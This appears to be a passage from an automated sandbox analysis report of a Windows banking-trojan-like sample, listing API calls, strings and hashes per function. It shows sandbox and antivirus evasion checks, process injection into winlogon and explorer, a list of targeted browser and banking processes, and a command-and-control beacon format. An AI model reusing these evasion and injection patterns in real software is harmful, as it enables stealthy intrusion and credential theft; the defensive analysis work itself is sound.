                                                                                                                                                                                                            • API String ID: 1986934500-2242665729
                                                                                                                                                                                                            • Opcode ID: dcb0f9743e80802f877bbcd23ef69d44cea1b355611397f996dda56557d589ba
                                                                                                                                                                                                            • Instruction ID: 93a8a5890c099451beed93aa5bb10ce8666d4c7aed195e4dba8c807d2c5e8bcd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcb0f9743e80802f877bbcd23ef69d44cea1b355611397f996dda56557d589ba
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2ED1B171A40215ABEB609FA49C59FAF7B7CEF08754F204598FA05E7180DBB4DA10CBA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegCloseKey.KERNEL32(?), ref: 00403A93
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                            • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                            • String ID: IsWow64Process$PnSw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3353599405-1027215798
                                                                                                                                                                                                            • Opcode ID: 21102898d184598221165a6fef4bec34bd79f3d1470297f61f252bfca23f0e31
                                                                                                                                                                                                            • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21102898d184598221165a6fef4bec34bd79f3d1470297f61f252bfca23f0e31
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC6991
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 02BC69C7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02BC69CE
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC69E3
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC69F2
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 02BC6A06
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC6A2C
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BC6A6A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BC6AA6
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 02BC6ABB
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02BC6AD3
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC6AE2
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BC6AEF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6B64
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC6B67
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6B74
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC6B77
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001,/faq.php,?,00000001,?,02BF96FC,00000001,00000000,00000000,/faq.php,?,00000001), ref: 02BC6BED
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC6BF0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6BFD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC6C00
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,?,00000001,00000000), ref: 02BC6C0F
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BC6C1C
                                                                                                                                                                                                            • Sleep.KERNEL32(?,00000001,/faq.php,?,00000001,?,02BF96FC,00000001,00000000,00000000,/faq.php,?,00000001,?,02BF96FC,00000001), ref: 02BC6C61
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileProcess$AttributesDeleteFreeSleepTempValidatememset$AdminAllocCountInformationNamePathTickTimeUserZone_snprintf
                                                                                                                                                                                                            • String ID: %2b$/faq.php$id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
                                                                                                                                                                                                            • API String ID: 889229162-4291654836
                                                                                                                                                                                                            • Opcode ID: 3cd50eecd23dab2fcd64cec50d91b0e3d6b5902d86cd8ea843968f6590b9bedf
                                                                                                                                                                                                            • Instruction ID: c17f44b944a2d28183354281b772f600a0497eb94dbbea9795c698af44d00c8a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3cd50eecd23dab2fcd64cec50d91b0e3d6b5902d86cd8ea843968f6590b9bedf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44810571E80219ABDB649B748D49FEB7B7DEF84340F5446D8FA05EB180EB709944CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00403A93
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                            • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                            • API String ID: 1431998568-3499098167
                                                                                                                                                                                                            • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                            • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                            • String ID: login$pass
                                                                                                                                                                                                            • API String ID: 1705285421-2248183487
                                                                                                                                                                                                            • Opcode ID: 11c2f349901282898cbec11f95baf0441f4e41db33dc55ef95c29a4c0e8eef05
                                                                                                                                                                                                            • Instruction ID: 654927405de22c295f3ba0dbb345389a190b2133247efb9e172250bd07ab3a1e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11c2f349901282898cbec11f95baf0441f4e41db33dc55ef95c29a4c0e8eef05
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F651A035948701EFD360CF64D888B6EBBE5FB887A1F508A0DFA65872D1E7709414CB62
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BC78B4
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: Process32First.KERNEL32(00000000,?), ref: 02BC78D9
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02BC78FD
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02BC7917
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: EnterCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC793B
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02BC7941
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02BC7948
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: LeaveCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC7977
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: Process32Next.KERNEL32(00000000,00000128), ref: 02BC798B
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC79A5
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 02BC79B6
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,000002F0), ref: 02BC7A34
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02BC7A58
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC7A82
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7A94
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB80), ref: 02BC7A9F
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7AC4
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02BC7B2B
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02BC7B4C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC7B70
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7B82
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB80), ref: 02BC7B8D
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7BB8
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC7C06
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC7C51
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB80,?,?), ref: 02BC7C90
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02BC7C9A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC7CA1
                                                                                                                                                                                                            • Sleep.KERNEL32(00000032), ref: 02BC7DB5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$OpenProcess32QueryTimesVirtual$AllocAllocateChangeCreateCurrentFindFirstNextNotificationSleepSnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2706041919-0
                                                                                                                                                                                                            • Opcode ID: 471e913d58ad95d26875f4222de12962d07bc318f739be98dc80da4e4755070e
                                                                                                                                                                                                            • Instruction ID: 6fc2fb28b9ba2b7b89b32959095ba37fa917705a70e906e95fca5a00cc656c5e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 471e913d58ad95d26875f4222de12962d07bc318f739be98dc80da4e4755070e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EC127B0A483419FD360CF65C884A6BFBE8FB88B54F64895EF699C7240DB709544CF92
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                              • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • Part of subcall function 00401CF0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004017D8
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheChangeCurrentErrorFindFlushFreeInstructionLastNotificationOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 2373081918-3024904723
                                                                                                                                                                                                            • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                            • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BD5680: memset.MSVCRT ref: 02BD56A6
                                                                                                                                                                                                              • Part of subcall function 02BD5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56B7
                                                                                                                                                                                                              • Part of subcall function 02BD5680: GetLastError.KERNEL32 ref: 02BD56C0
                                                                                                                                                                                                              • Part of subcall function 02BD5680: SwitchToThread.KERNEL32 ref: 02BD56CF
                                                                                                                                                                                                              • Part of subcall function 02BD5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56D8
                                                                                                                                                                                                              • Part of subcall function 02BD5680: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD56F8
                                                                                                                                                                                                              • Part of subcall function 02BD5680: CloseHandle.KERNEL32(00000000), ref: 02BD5709
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02BD4CFF
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02BD4D1E
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BD4D3D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BD4D53
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 02BD4D5F
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BD4D7A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BD4D8A
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02BD4DC4
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02BD4DE5
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02BD4E11
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BD4E29
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02BD4E44
                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02BD4E52
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02BD4E7A
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02BD4E8C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD4EA4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD4EB5
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02BD4ED6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD4EF2
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD4F03
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 2650560580-3024904723
                                                                                                                                                                                                            • Opcode ID: f65b58ec25810f257154d9f40708fff7cf862138ba577591463d415b3b901667
                                                                                                                                                                                                            • Instruction ID: 28172f90e5e0e640766d7087b7683017d09902a65e3f7253698369a4a91b92d5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f65b58ec25810f257154d9f40708fff7cf862138ba577591463d415b3b901667
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED617075640305BBEB64DF64CC88FEA7BB8EF84744F548459FA059B280E7B4EA41CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                            • DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02BC4FE7
                                                                                                                                                                                                            • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02BC5045
                                                                                                                                                                                                            • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                            • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                            • API String ID: 1656757314-3977723178
                                                                                                                                                                                                            • Opcode ID: c3c80d3cf26a5e342067f1323bf404e87d75f50e9bf4ab15635f7090e8849dac
                                                                                                                                                                                                            • Instruction ID: d59620ce9ac73ee1955c6b66e805a94096b6de4643486066d5af0fae7501bad0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3c80d3cf26a5e342067f1323bf404e87d75f50e9bf4ab15635f7090e8849dac
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3621A476A8431867EB70D6A4AC41FDAB76CDB54750F4045D5F788E7080DAF0AAD48BE0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02BB7FF1
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BB8002
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02BB8010
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BB8019
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BB802F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB8041
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BB8069
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02BB8082
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 02BB808D
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 02BB8099
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 02BB80A4
                                                                                                                                                                                                            Strings
